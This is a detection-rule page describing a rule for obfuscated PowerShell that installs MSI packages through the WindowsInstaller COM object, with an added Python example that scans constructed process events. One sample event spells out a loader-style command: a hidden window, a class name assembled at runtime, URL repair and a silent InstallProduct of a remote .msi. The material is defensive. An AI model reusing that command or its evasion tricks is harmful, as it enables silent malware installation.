Obfuscated PowerShell MSI Install via WindowsInstaller COM

Rule Info

Name
Obfuscated PowerShell MSI Install via WindowsInstaller COM
Author
Meroujan Antonyan (vx3r)
Description
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`). The technique manipulates strings so that the literal values a static scanner would look for never appear in the script: the COM class name is assembled by string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and a deliberately malformed URL is repaired at runtime (e.g., converting 'htps://' to 'https://'). This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` together with COM object creation, particularly combined with hidden-window execution and a suppressed installer UI, indicates an attempt to install software (likely malicious) without user interaction.
Date
2025-05-27 00:00:00
Modified
None
Id
7b6a7418-3afc-11f0-aff4-000d3abf478c
Tags
attack.defense-evasion attack.t1027.010 attack.t1218.007 attack.execution attack.t1059.001
Type
Community Rule
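The following is an added example, not the rule's own selection logic or code from the author: it runs a set of indicators modelled on the description above (reassembled COM class name, runtime URL repair, `InstallProduct`, hidden window, suppressed UI) over three constructed process-creation events. The event shapes, the regular expressions and the `analyse`/`scan` functions are assumptions made for the example; the real rule's fields and conditions may differ.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 / Security 4688
# records. These are made-up sample lines for the example, not real telemetry.
SAMPLE_EVENTS = [
    {   # loader style: COM class name and URL only exist in usable form at runtime
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            "powershell.exe -NoP -W Hidden -C \""
            "$c='indowsInstaller.Installer'.Insert(0,'W');"
            "$u='htps://example.invalid/update.msi'.Replace('htps://','https://');"
            "$i=New-Object -ComObject $c;$i.UILevel=2;$i.InstallProduct($u)\""
        ),
    },
    {   # routine admin use of the same COM object, written in the clear
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            "powershell.exe -Command \""
            "$i=New-Object -ComObject WindowsInstaller.Installer;"
            "$i.InstallProduct('C:\\pkgs\\tool.msi')\""
        ),
    },
    {   # plain msiexec install, not PowerShell at all
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /i "C:\Temp\app.msi" /qn',
    },
]

# Hypothetical indicators modelled on the rule description (the real rule's selection
# may differ). PowerShell is case-insensitive, so every pattern is compiled with re.I.
POWERSHELL_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
# 'indowsInstaller.Installer'.Insert(0,'W'): the class name is reassembled at runtime
SPLIT_CLASS_NAME = re.compile(
    r"'indowsInstaller\.Installer'\s*\.Insert\(\s*0\s*,\s*'W'\s*\)", re.I)
# a malformed scheme such as htps:// that a later .Replace()/.Insert() repairs
URL_FIXUP = re.compile(r"htps://.*?\.(?:Replace|Insert)\(", re.I | re.S)
INSTALL_PRODUCT = re.compile(r"\.InstallProduct\s*\(", re.I)
# -W Hidden, -WindowStyle Hidden and the abbreviated forms in between
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I)
# Installer.UILevel = 2 (msiUILevelNone) suppresses the installer UI
SUPPRESSED_UI = re.compile(r"\.UILevel\s*=\s*2\b", re.I)

OBFUSCATION_INDICATORS = {"com_class_built_at_runtime", "url_repaired_at_runtime"}


def analyse(event):
    """Return the indicators that fire for one event, or [] when the event is not a match.

    Matching needs an InstallProduct call plus at least one obfuscation marker, so a
    readable admin script that uses the COM object stays below the alert threshold.
    """
    if not POWERSHELL_IMAGE.search(event.get("Image", "")):
        return []
    cmd = event.get("CommandLine", "")
    hits = []
    if SPLIT_CLASS_NAME.search(cmd):
        hits.append("com_class_built_at_runtime")
    if URL_FIXUP.search(cmd):
        hits.append("url_repaired_at_runtime")
    if INSTALL_PRODUCT.search(cmd):
        hits.append("installproduct_call")
    if HIDDEN_WINDOW.search(cmd):
        hits.append("hidden_window")
    if SUPPRESSED_UI.search(cmd):
        hits.append("ui_suppressed")
    if "installproduct_call" in hits and OBFUSCATION_INDICATORS & set(hits):
        return hits
    return []


def scan(events):
    """Indices of the events that match, for running the logic over a batch of log lines."""
    return [i for i, e in enumerate(events) if analyse(e)]


if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(i, analyse(SAMPLE_EVENTS[i]))
```

Two practical caveats when tuning something like this: the second sample shows why the install call alone must not alert, since `WindowsInstaller.Installer` and `InstallProduct` are ordinary administrative usage and only the runtime string reassembly makes the first sample suspicious; and the indicators only work where the script text is visible, so a payload passed via `-EncodedCommand` or loaded from a file will not show these strings on the command line and needs script block logging (PowerShell Event ID 4104) as the source instead.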

Rule History

Author
vx3r
Title
Merge PR #5436 from @vx3r - Obfuscated PowerShell MSI Install via WindowsInstaller COM
Date
2025-06-04
Commit